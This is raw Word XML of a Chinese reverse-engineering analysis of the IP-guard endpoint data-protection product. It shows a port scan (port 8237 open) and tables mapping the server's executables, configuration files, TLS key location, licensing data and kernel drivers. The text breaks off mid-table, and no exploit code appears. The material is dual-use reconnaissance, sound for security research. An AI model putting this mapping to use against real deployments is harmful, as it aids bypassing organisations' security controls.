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F2DFB1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="ip-guard-逆向分析"/>
      <w:r>
        <w:t xml:space="preserve">IP-guard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逆向分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76F0B8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927DBD7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="仿宋"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="Xf5109e9f411d7868e3645dfc1dce031ae115448"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、基础分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBBD0D2">
      <w:pPr>
        <w:pStyle w:val="5"/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端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E1F8C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5410200" cy="5067300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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506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02A842">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="仿宋"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开放多个tcp端口，其中oserver3对应的8237端口已开放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23231C0A">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.文件安装目录分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4360A71E">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="核心服务程序最关键"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心服务程序（最关键）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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2"/>
        <w:gridCol w:w="6601"/>
      </w:tblGrid>
      <w:tr w14:paraId="0BB776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C29F2F7">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6601" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3F638A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6734F1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034EDE2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OServer3_x64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6601" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03C7EA4D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>主服务器进程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，核心引擎，管理所有客户端</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A6C5C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5E000A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OConsole3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6601" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106FCD4C">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>管理控制台</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，管理员操作界面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F7ED6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D46BAC6">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>AKernel3.e32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6601" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61041F8F">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>核心内核数据包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，最大文件，包含核心功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06E1B2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863648">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OGuard3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6601" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29FAC58C">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>守护进程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，监控主服务存活，负责自动重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12E33BD2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7270176C">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="关键配置文件"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键配置文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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66"/>
        <w:gridCol w:w="5787"/>
      </w:tblGrid>
      <w:tr w14:paraId="10CD35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9E66265">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E5D9DC4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460044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35D8B5">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OServer3.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B30EF1">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主服务配置（实例名</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IPGUARD）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="155E31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D04CE00">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OReportServer3.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1845DFA7">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报表服务配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B9AEE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9B7308">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OMailRpt.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9AB6BE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>邮件报告配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29433D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1C52D0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>server.crt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>server.key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274D6F3C">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TLS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>证书和私钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D5898EB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p w14:paraId="179DE2F5">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="重要数据文件"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重要数据文件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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17"/>
        <w:gridCol w:w="4352"/>
      </w:tblGrid>
      <w:tr w14:paraId="35D8E8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8D6D320">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1968B139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427669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F0D64F0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>AuthSoft.dat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (4.6MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1CAD87">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>软件授权数据库（Windows端）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31D97E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352E433">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>AuthSoftLinux.dat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>AuthSoftMac.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B2E0227">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux/Mac </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>授权数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C96D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E2CC2D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>DocWaterMark.dat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (96MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6928A776">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档水印数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E30F1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CAF30B0">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TSecBxLibV4_OServer.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E945A7">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全沙盒库？</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06AC77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D0B6A89">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>SCIFtRule.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C10A6E2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密级过滤规则？</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1811F6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D0D7A71">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>agenthistory.dat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F7C694">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>客户端历史记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="19F635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FFFC6E8">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>0_LastConnectServerID.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4352" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697E623B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最后连接服务器</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60725114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098CFB71">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="功能性服务模块"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能性服务模块</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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78"/>
        <w:gridCol w:w="5891"/>
      </w:tblGrid>
      <w:tr w14:paraId="30FA78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D9609C2">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB070F4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2C9958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A46AFBE">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OReportServer3_x64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB3E531">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报表服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="355070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AC2FDA">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OReport3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4972D3C9">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>报表生成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A1243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DDFEDB">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OMailRpt.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="669F95E3">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>邮件报告发送</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4FFA82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D6D2A4">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>ODataboard_x64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A1497D7">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据看板服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C5455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CA8455">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OHADBSync_x64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C348528">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>高可用数据库同步</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="130E6B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999177A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>OUpdate3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F470657">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>客户端更新服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30F7EA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9FFF08">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>RInst3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB98515">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程安装工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C98C7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83609E">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>IPgMidtierUpgrade3.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68AC2602">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件升级程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29670DD5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582A4036">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="核心-dll系统依赖"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL（系统依赖）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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59"/>
        <w:gridCol w:w="4110"/>
      </w:tblGrid>
      <w:tr w14:paraId="212A53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B5720C8">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D15DAE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1BB4E2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73D55C9">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TCmnUtils64.dll</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TCmnUtils32.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="569CA074">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>公共工具库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5B8AEC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BE2805A">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TUserSystem64.dll</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TUserSystem32.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E8C2851">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户系统管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="66429E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95B12D">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>IPGMsg.dll</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>IPGMsg_x64.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D68F66">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>消息处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="77A0ED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270777">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TSDDrv64.sys</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TSDDrv32.sys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E73C0E">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>内核驱动</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（文件加密/监控）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6BBFAB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906F07E">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TVDisk64.sys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28BA4657">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>虚拟磁盘驱动</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="560225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C18E0B">
            <w:pPr>
              <w:pStyle w:val="24"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="48"/>
              </w:rPr>
              <w:t>TWebServer.dll</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (15MB)</w:t>
